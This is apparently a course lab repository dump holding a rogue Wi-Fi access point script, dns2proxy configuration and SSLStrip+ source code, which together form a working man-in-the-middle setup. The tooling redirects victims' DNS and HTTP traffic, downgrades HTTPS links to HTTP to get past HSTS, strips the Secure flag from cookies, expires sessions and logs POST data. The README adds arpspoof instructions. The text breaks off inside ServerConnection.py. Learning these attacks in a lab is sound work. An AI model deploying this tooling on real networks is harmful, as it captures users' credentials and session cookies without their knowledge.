01:59:52 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 123 | 2017-06-27 01:59:54 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 124 | 2017-06-27 01:59:58 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 125 | 2017-06-27 02:00:01 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 126 | 2017-06-27 02:00:02 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 127 | 2017-06-27 02:00:04 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 128 | 2017-06-27 02:00:06 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 129 | 2017-06-27 02:00:07 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 130 | -------------------------------------------------------------------------------- /lab4/dns2proxy/domains.cfg: -------------------------------------------------------------------------------- 1 | .domain.com 10.0.0.1 2 | 3 | -------------------------------------------------------------------------------- /lab4/dns2proxy/fhtagn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | iptables -P INPUT ACCEPT 4 | iptables -F 5 | iptables -F -t nat 6 | 7 | killall python2.6 8 | -------------------------------------------------------------------------------- /lab4/dns2proxy/ia.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Lanzar: start.sh 4 | # 5 | # Example: start.sh eth0 192.168.1.101 192.168.1.200 6 | 7 | 8 | 9 | interfaz=$1 10 | dnsserver=$2 11 | routingIP=$3 12 | 13 | adminIP="192.168.1.82" 14 | 15 | ifconfig $interfaz:1 $routingIP 16 | 17 | iptables -F 18 | iptables -F -t nat 19 | iptables -P INPUT DROP 20 | iptables -A INPUT -p tcp --dport 443 -j REJECT --reject-with tcp-reset 21 | #iptables -A INPUT -p tcp --dport 443 -j ACCEPT 22 | iptables -A INPUT -p tcp --dport 80 -j ACCEPT 23 | iptables -A INPUT -s $adminIP -j ACCEPT 24 | 25 | #iptables -A INPUT -p tcp --dport 5900 -j ACCEPT 26 | #iptables -A INPUT -p tcp --dport 5901 -j ACCEPT 27 | iptables -A INPUT -p udp --dport 53 -j ACCEPT 28 | iptables -A INPUT -p udp --sport 53 -j ACCEPT 29 | 30 | iptables -A INPUT -p udp -j REJECT 31 | iptables -A INPUT -p icmp -j REJECT 32 | iptables -A INPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT 33 | 34 | modprobe ip_nat_ftp 35 | modprobe ip_conntrack_ftp 36 | iptables -A INPUT -m helper --helper ftp -j ACCEPT 37 | 38 | python2.6 dns2proxy.py $interfaz $dnsserver $routingIP 39 | 40 | 41 | -------------------------------------------------------------------------------- /lab4/dns2proxy/nospoof.cfg: -------------------------------------------------------------------------------- 1 | imap.gmail.com 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/nospoofto.cfg: -------------------------------------------------------------------------------- 1 | 127.0.0.1 -------------------------------------------------------------------------------- /lab4/dns2proxy/resolv.conf: -------------------------------------------------------------------------------- 1 | nameserver 8.8.8.8 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/spoof.cfg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /lab4/dns2proxy/transform.cfg: -------------------------------------------------------------------------------- 1 | #Transformation file 2 | wwww.:www. 3 | social.:www. 4 | web: 5 | cuentas:accounts 6 | gmail:mail 7 | chatenabled.gmail.google.com:chatenabled.mail.google.com 8 | -------------------------------------------------------------------------------- /lab4/dns2proxy/victims.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/dns2proxy/victims.cfg -------------------------------------------------------------------------------- /lab4/partial-hsts-bypass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 11 | bssid="$(macchanger -s wlan0 | tail -n1 | awk '{ print $3 }')" 12 | 13 | # set the essid to the first command line argument 14 | essid="$1" 15 | 16 | # set the essid to the second command line argument 17 | channel="$2" 18 | 19 | echo "[*] Starting hotspot script..." 20 | echo "[*] Using configs:" 21 | 22 | echo "[*] --> essid: $essid" 23 | echo "[*] --> bssid: $bssid" 24 | echo "[*] --> channel: $channel" 25 | echo "[*] --> AP interface: $phy" 26 | echo "[*] --> upstream interface: $upstream" 27 | 28 | # Mercilessly destroy interfering processes. There is a more elegent 29 | # way to do this using nmcli, but ain't nobody got time for that shit. ;) 30 | 31 | echo "[*] Stopping NetworkManager..." 32 | systemctl stop network-manager 33 | sleep 3 34 | 35 | # Stopping network-manager will push a soft block on our wireless interfaces. 36 | # We need to undo that. 37 | echo "[*] Removing soft block on wireless interfaces..." 38 | rfkill unblock wlan 39 | 40 | # Stopping network-manager will also disable all of our network interfaces. 41 | # Let's reenable them. 42 | echo "[*] Reenabling $phy interface" 43 | ifconfig $phy up 44 | 45 | # Next we create a hostapd config file. We start by giving hostapd 46 | # an interface with which to create an access point. 47 | echo "[*] Creating hostapd config file...." 48 | echo "interface=$phy" > hostapd.conf 49 | 50 | # Next we specify our ESSID, BSSID, and channel information. 51 | echo "ssid=$essid" >> hostapd.conf 52 | echo "bssid=$bssid" >> hostapd.conf 53 | echo "channel=$channel" >> hostapd.conf 54 | 55 | # Finally, set the hardware mode to g for compatibility with our 56 | # TP-Link cards. 57 | echo "hw_mode=g" >> hostapd.conf 58 | 59 | # Now that we have a config file, start hostapd as a background process. 60 | echo "[*] Starting hostapd" 61 | hostapd ./hostapd.conf & 62 | sleep 7 63 | 64 | echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24" 65 | # Give our new AP an IP address and subnet mask 66 | ifconfig $phy 10.0.0.1 netmask 255.255.255.0 67 | 68 | # Update routing table to allow rogue AP to serve as default gateway 69 | # of its subnet 70 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 71 | 72 | # Next we create our dnsmasq. Remember we're only using dnsmasq as 73 | # a DHCP server at this time. 74 | 75 | echo "[*] Creating dnsmasq config file..." 76 | # The first line in our config defines a DHCP pool of 10.0.0.80 through 77 | # 10.0.0.254, with a DHCP lease 6 hours. 78 | echo "dhcp-range=10.0.0.80,10.0.0.254,6h" > dnsmasq.conf 79 | 80 | # The next line tells dnsmasq to issue a DHCP option that instructs 81 | # new members of the 10.0.0.0/24 network to use Google (8.8.8.8) as 82 | # a DNS server. 83 | echo "dhcp-option=6,8.8.8.8" >> dnsmasq.conf 84 | 85 | # Next, we add a line that tells dnsmasq to issue a DHCP option that 86 | # instructs new member of 10.0.0.0/24 to use our rogue AP as a gateway. 87 | echo "dhcp-option=3,10.0.0.1" >> dnsmasq.conf 88 | 89 | # The next two lines tell dnsmasq to act as an authoritative DHCP server 90 | # and to log DHCP queries. 91 | echo "dhcp-authoritative" >> dnsmasq.conf 92 | echo "log-queries" >> dnsmasq.conf 93 | 94 | 95 | # Finally we start dnsmasq, telling it to use our config file. By default, 96 | # dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do 97 | # this, we keep it from doing so using the -z flag. Additionally, we use 98 | # the -i flag to force dnsmasq to only listen on our $Phy interface. 99 | # We use the -I flag to explicity forbid dnsmasq from running on our 100 | # local interface. 101 | 102 | echo "[*] Starting dnsmasq as DHCP server... DNS set to 8.8.8.8" 103 | dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo 104 | 105 | # We enable packet forwarding by interacing with the /proc file system. 106 | echo "[*] Enabling packet forwarding" 107 | echo '1' > /proc/sys/net/ipv4/ip_forward 108 | 109 | echo "[*] Performing iptables magic" 110 | 111 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 112 | # all by default. 113 | iptables --policy INPUT ACCEPT 114 | iptables --policy FORWARD ACCEPT 115 | iptables --policy OUTPUT ACCEPT 116 | 117 | # We then flush all tables to give ourselves a clean slate. 118 | iptables --flush 119 | iptables --table nat --flush 120 | 121 | 122 | # Next we append a rule to the POSTROUTING chain of iptables. Changes 123 | # made to the POSTROUTING chain are not visible to the Linux kernel since 124 | # the chain is applied to every packet before it leaves the system. The rule 125 | # chain that we append to is called MASQUERADE. When applied to a packet, 126 | # the MASQUERADE chain sets the source IP address to the outbound NIC's 127 | # external IP address. This effectively creates an NAT. 128 | 129 | # To summarize, we tell iptables to change the source IP address of each packet 130 | # to that of eth0 and to send each packet to eth0 after this modification 131 | # occurs. 132 | iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE 133 | iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT 134 | 135 | iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000 136 | #iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000 137 | 138 | #iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53 139 | iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump DNAT --to 10.0.0.1 140 | 141 | iptables --table nat --append POSTROUTING --jump MASQUERADE 142 | 143 | python ./sslstrip2/sslstrip.py -l 10000 -p -w ./sslstrip.log & 144 | python ./dns2proxy/dns2proxy.py -i wlan0 & 145 | 146 | read -p 'Hotspot ready. Press enter to quit...' 147 | 148 | # kill the daemon processes that we started earlier 149 | echo "[*] Killing daemons" 150 | killall dnsmasq 151 | killall hostapd 152 | killall python 153 | sleep 5 154 | 155 | # We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept 156 | # all by default. 157 | echo "[*] Restoring iptables" 158 | iptables --policy INPUT ACCEPT 159 | iptables --policy FORWARD ACCEPT 160 | iptables --policy OUTPUT ACCEPT 161 | 162 | # We then flush all tables to give ourselves a clean slate. 163 | iptables --flush 164 | iptables --table nat --flush 165 | -------------------------------------------------------------------------------- /lab4/sslstrip2/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | -------------------------------------------------------------------------------- /lab4/sslstrip2/README: -------------------------------------------------------------------------------- 1 | sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 2 | attacks. 3 | 4 | It requires Python 2.5 or newer, along with the 'twisted' python module. 5 | 6 | Installing: 7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz 8 | * Install twisted: sudo apt-get install python-twisted-web 9 | * (Optionally) run 'python setup.py install' as root to install, 10 | or you can just run it out of the directory. 11 | 12 | Running: 13 | sslstrip can be run from the source base without installation. 14 | Just run 'python sslstrip.py -h' as a non-root user to get the 15 | command-line options. 16 | 17 | The four steps to getting this working (assuming you're running Linux) 18 | are: 19 | 20 | 1) Flip your machine into forwarding mode (as root): 21 | echo "1" > /proc/sys/net/ipv4/ip_forward 22 | 23 | 2) Setup iptables to intercept HTTP requests (as root): 24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 25 | 26 | 3) Run sslstrip with the command-line options you'd like (see above). 27 | 28 | 4) Run arpspoof to redirect traffic to your machine (as root): 29 | arpspoof -i -t 30 | 31 | More Info: 32 | http://www.thoughtcrime.org/software/sslstrip/ 33 | -------------------------------------------------------------------------------- /lab4/sslstrip2/README.md: -------------------------------------------------------------------------------- 1 | SSLStrip+ 2 | ========= 3 | 4 | This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism. 5 | 6 | This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information. 7 | 8 | For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it at https://github.com/LeonardoNve/dns2proxy. 9 | 10 | 11 | Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48 12 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random, re 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'referer' in headers: 60 | real = self.urlMonitor.real 61 | if len(real)>0: 62 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 63 | headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) 64 | 65 | if 'if-modified-since' in headers: 66 | del headers['if-modified-since'] 67 | 68 | if 'cache-control' in headers: 69 | del headers['cache-control'] 70 | 71 | if 'if-none-match' in headers: 72 | del headers['if-none-match'] 73 | 74 | if 'host' in headers: 75 | host = self.urlMonitor.URLgetRealHost("%s"%headers['host']) 76 | logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host)) 77 | headers['host'] = host 78 | headers['securelink'] = '1' 79 | self.setHeader('Host',host) 80 | 81 | return headers 82 | 83 | def getPathFromUri(self): 84 | if (self.uri.find("http://") == 0): 85 | index = self.uri.find('/', 7) 86 | return self.uri[index:] 87 | 88 | return self.uri 89 | 90 | 91 | def getPathToLockIcon(self): 92 | if os.path.exists("lock.ico"): return "lock.ico" 93 | 94 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 95 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 96 | 97 | if os.path.exists(scriptPath): return scriptPath 98 | 99 | logging.warning("Error: Could not find lock.ico") 100 | return "lock.ico" 101 | 102 | def save_req(self,lfile,str): 103 | f = open(lfile,"a") 104 | f.write(str) 105 | f.close() 106 | 107 | def handleHostResolvedSuccess(self, address): 108 | headers = self.cleanHeaders() 109 | # for header in headers: 110 | # logging.debug("HEADER %s = %s",header,headers[header]) 111 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 112 | lhost = self.getHeader("host").lower() 113 | host = self.urlMonitor.URLgetRealHost("%s"%lhost) 114 | client = self.getClientIP() 115 | path = self.getPathFromUri() 116 | self.content.seek(0,0) 117 | postData = self.content.read() 118 | real = self.urlMonitor.real 119 | patchDict = self.urlMonitor.patchDict 120 | 121 | if len(real)>0: 122 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 123 | path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) 124 | postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) 125 | if len(patchDict)>0: 126 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 127 | postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) 128 | 129 | url = 'http://' + host + path 130 | headers['content-length']="%d"%len(postData) 131 | 132 | self.dnsCache.cacheResolution(host, address) 133 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 134 | logging.debug("Sending expired cookies...") 135 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 136 | host, headers, path)) 137 | elif (self.urlMonitor.isSecureFavicon(client, path)): 138 | logging.debug("Sending spoofed favicon response...") 139 | self.sendSpoofedFaviconResponse() 140 | elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): 141 | if 'securelink' in headers: 142 | del headers['securelink'] 143 | logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url)) 144 | self.proxyViaSSL(address, self.method, path, postData, headers, 145 | self.urlMonitor.getSecurePort(client, url)) 146 | else: 147 | logging.debug("LEO Sending request via HTTP...") 148 | self.proxyViaHTTP(address, self.method, path, postData, headers) 149 | 150 | def handleHostResolvedError(self, error): 151 | logging.warning("Host resolution error: " + str(error)) 152 | self.finish() 153 | 154 | def resolveHost(self, host): 155 | address = self.dnsCache.getCachedAddress(host) 156 | 157 | if address != None: 158 | logging.debug("Host cached.") 159 | return defer.succeed(address) 160 | else: 161 | logging.debug("Host not cached.") 162 | return reactor.resolve(host) 163 | 164 | def process(self): 165 | host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host')) 166 | logging.debug("Resolving host: %s" % host) 167 | deferred = self.resolveHost(host) 168 | 169 | deferred.addCallback(self.handleHostResolvedSuccess) 170 | deferred.addErrback(self.handleHostResolvedError) 171 | 172 | def proxyViaHTTP(self, host, method, path, postData, headers): 173 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 174 | self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 175 | connectionFactory.protocol = ServerConnection 176 | self.reactor.connectTCP(host, 80, connectionFactory) 177 | 178 | def proxyViaSSL(self, host, method, path, postData, headers, port): 179 | self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 180 | clientContextFactory = ssl.ClientContextFactory() 181 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 182 | connectionFactory.protocol = SSLServerConnection 183 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 184 | 185 | def sendExpiredCookies(self, host, path, expireHeaders): 186 | self.setResponseCode(302, "Moved") 187 | self.setHeader("Connection", "close") 188 | self.setHeader("Location", "http://" + host + path) 189 | 190 | for header in expireHeaders: 191 | self.setHeader("Set-Cookie", header) 192 | 193 | self.finish() 194 | 195 | def sendSpoofedFaviconResponse(self): 196 | icoFile = open(self.getPathToLockIcon()) 197 | 198 | self.setResponseCode(200, "OK") 199 | self.setHeader("Content-type", "image/x-icon") 200 | self.write(icoFile.read()) 201 | 202 | icoFile.close() 203 | self.finish() 204 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | newvalues =[] 49 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 50 | values = value.split(';') 51 | for v in values: 52 | if v[:7].lower()==' domain': 53 | dominio=v.split("=")[1] 54 | logging.debug("LEO Parsing cookie domain parameter: %s"%v) 55 | real = self.urlMonitor.sustitucion 56 | if dominio in real: 57 | v=" Domain=%s"%real[dominio] 58 | logging.debug("LEO New cookie domain parameter: %s"%v) 59 | newvalues.append(v) 60 | value = ';'.join(newvalues) 61 | 62 | if (key.lower() == 'access-control-allow-origin'): 63 | value='*' 64 | 65 | ServerConnection.handleHeader(self, key, value) 66 | 67 | def stripFileFromPath(self, path): 68 | (strippedPath, lastSlash, file) = path.rpartition('/') 69 | return strippedPath 70 | 71 | def buildAbsoluteLink(self, link): 72 | absoluteLink = "" 73 | 74 | if ((not link.startswith('http')) and (not link.startswith('/'))): 75 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 76 | 77 | logging.debug("Found path-relative link in secure transmission: " + link) 78 | logging.debug("New Absolute path-relative link: " + absoluteLink) 79 | elif not link.startswith('http'): 80 | absoluteLink = "http://"+self.headers['host']+link 81 | 82 | logging.debug("Found relative link in secure transmission: " + link) 83 | logging.debug("New Absolute link: " + absoluteLink) 84 | 85 | if not absoluteLink == "": 86 | absoluteLink = absoluteLink.replace('&', '&') 87 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 88 | 89 | def replaceCssLinks(self, data): 90 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 91 | 92 | for match in iterator: 93 | self.buildAbsoluteLink(match.group(1)) 94 | 95 | return data 96 | 97 | def replaceFavicon(self, data): 98 | match = re.search(SSLServerConnection.iconExpression, data) 99 | 100 | if (match != None): 101 | data = re.sub(SSLServerConnection.iconExpression, 102 | "", data) 103 | else: 104 | data = re.sub(SSLServerConnection.headExpression, 105 | "", data) 106 | 107 | return data 108 | 109 | def replaceSecureLinks(self, data): 110 | data = ServerConnection.replaceSecureLinks(self, data) 111 | data = self.replaceCssLinks(data) 112 | 113 | if (self.urlMonitor.isFaviconSpoofing()): 114 | data = self.replaceFavicon(data) 115 | 116 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 117 | 118 | for match in iterator: 119 | self.buildAbsoluteLink(match.group(10)) 120 | 121 | return data 122 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlTypewww = re.compile(r"https://www", re.IGNORECASE) 34 | urlwExplicitPort = 